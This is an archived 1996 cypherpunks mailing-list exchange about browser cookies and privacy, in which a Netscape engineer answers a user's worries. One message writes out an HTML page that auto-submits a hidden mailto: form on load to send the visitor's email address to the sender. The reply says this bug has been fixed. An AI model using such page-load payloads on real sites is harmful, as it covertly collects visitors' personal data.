From jfricker@vertexgroup.com Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com
To: cypherpunks-legacy@lists.cpunks.org
Subject: Re: Stealth cookies
Date: Wed, 17 Dec 2003 23:17:14 +0000
Message-ID: <2.2.32.19960806171618.00a52aec@vertexgroup.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="===============4587553688734279353=="

--===============4587553688734279353==
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 7bit


At 12:10 AM 8/6/96 -0700, you wrote:
>John F. Fricker wrote:
>> Solution?
>> 
>> 1) Don't put your name in the netscape configuration (d'oh)
>
>  No, no, no.  Netscape navigator does not reveal your name or
>put it into cookies.  The only way to get your name or other
>personal information about you into a cookie is for you to type
>it into a web site, and have that site send you back a cookie.
>
>  The only time we reveal your name is in e-mail headers, and
>when doing anonymous FTP when you have manually disabled the default
>of sending 'mozilla@' as the anon ftp password.
>
>	--Jeff
>

Oh I was just being paranoid I guess. There used to be JavaScript that would
automatically send email from a page. something like 

<html>
<body onLoad="document.mailme.submit()">
<form method=post name="mailme"
action="mailto:john@vertexgroup.com?subject=user address">
<input type=hidden name="userAddress" value="done">
</form>
</body>
</html>

But even if that still works it would be a good trick to associate it with a
cookie.






--===============4587553688734279353==--


From jsw@netscape.com Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
To: cypherpunks-legacy@lists.cpunks.org
Subject: Re: Stealth cookies
Date: Wed, 17 Dec 2003 23:17:14 +0000
Message-ID: <3207E80C.79D1@netscape.com>
In-Reply-To: <2.2.32.19960806171618.00a52aec@vertexgroup.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="===============4287692415703512418=="

--===============4287692415703512418==
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 7bit


John F. Fricker wrote:
> Oh I was just being paranoid I guess. There used to be JavaScript that would
> automatically send email from a page. something like
> 
> <html>
> <body onLoad="document.mailme.submit()">
> <form method=post name="mailme"
> action="mailto:john@vertexgroup.com?subject=user address">
> <input type=hidden name="userAddress" value="done">
> </form>
> </body>
> </html>
> 
> But even if that still works it would be a good trick to associate it with a
> cookie.

  This was a bug that existed for a short time, and was fixed about
6 months ago.  Javascript can not submit mailto: forms at all, and
all mailto: forms now cause a warning dialog to come up(the dialog
can be turned off in preferences).

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




--===============4287692415703512418==--